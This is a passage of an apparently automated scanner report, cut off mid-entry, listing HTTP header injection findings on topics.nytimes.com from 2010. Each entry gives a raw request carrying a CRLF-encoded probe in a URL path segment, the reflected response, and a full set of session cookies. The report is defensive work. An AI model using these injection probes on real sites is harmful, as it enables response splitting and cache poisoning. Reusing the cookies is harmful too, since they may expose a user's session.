GET /top/news/science/topics/ffc0c%0d%0a5ed16640b46/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:53 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/science/topics/ffc0c 5ed16640b46/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/editorials/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 9c216%0d%0aceb0867e582 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/9c216%0d%0aceb0867e582/editorialsandoped/editorials/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:39 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/9c216 ceb0867e582/editorialsandoped/editorials/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/editorials/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 633c2%0d%0a634021120ae was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/633c2%0d%0a634021120ae/editorials/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/633c2 634021120ae/editorials/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/editorials/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 5b057%0d%0a7de59d5e87c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/5b057%0d%0a7de59d5e87c/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:41 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5b057 7de59d5e87c/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/letters/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 4f8b6%0d%0aedfd03c9e7d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/4f8b6%0d%0aedfd03c9e7d/editorialsandoped/letters/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:17 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/4f8b6 edfd03c9e7d/editorialsandoped/letters/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/letters/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 5ee1d%0d%0aff2ef789888 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/5ee1d%0d%0aff2ef789888/letters/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:17 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/5ee1d ff2ef789888/letters/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/letters/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 37796%0d%0aa3f1fddc26a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/37796%0d%0aa3f1fddc26a/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:17 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/37796 a3f1fddc26a/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 69187%0d%0a2bc25511dfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/69187%0d%0a2bc25511dfe/editorialsandoped/oped/columnists/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:36 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/69187 2bc25511dfe/editorialsandoped/oped/columnists/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload dacbc%0d%0a30104000c6c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/dacbc%0d%0a30104000c6c/oped/columnists/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:36 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/dacbc 30104000c6c/oped/columnists/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload f176e%0d%0a6d9076032fb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/f176e%0d%0a6d9076032fb/columnists/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:36 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/f176e 6d9076032fb/columnists/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 95d86%0d%0a19497670268 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/95d86%0d%0a19497670268/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:37 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/95d86 19497670268/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload cdd86%0d%0a38aad6d8e1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/cdd86%0d%0a38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/cdd86 38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 8a68b%0d%0a66ffcb46ee5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/8a68b%0d%0a66ffcb46ee5/oped/columnists/paulkrugman/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/8a68b 66ffcb46ee5/oped/columnists/paulkrugman/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 5d2b0%0d%0aa613315c88b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/5d2b0%0d%0aa613315c88b/columnists/paulkrugman/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5d2b0 a613315c88b/columnists/paulkrugman/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 9110f%0d%0af9cc7c13367 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/9110f%0d%0af9cc7c13367/paulkrugman/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:59:40 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/9110f f9cc7c13367/paulkrugman/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ |
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload ca88e%0d%0a95b10fb38c5 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
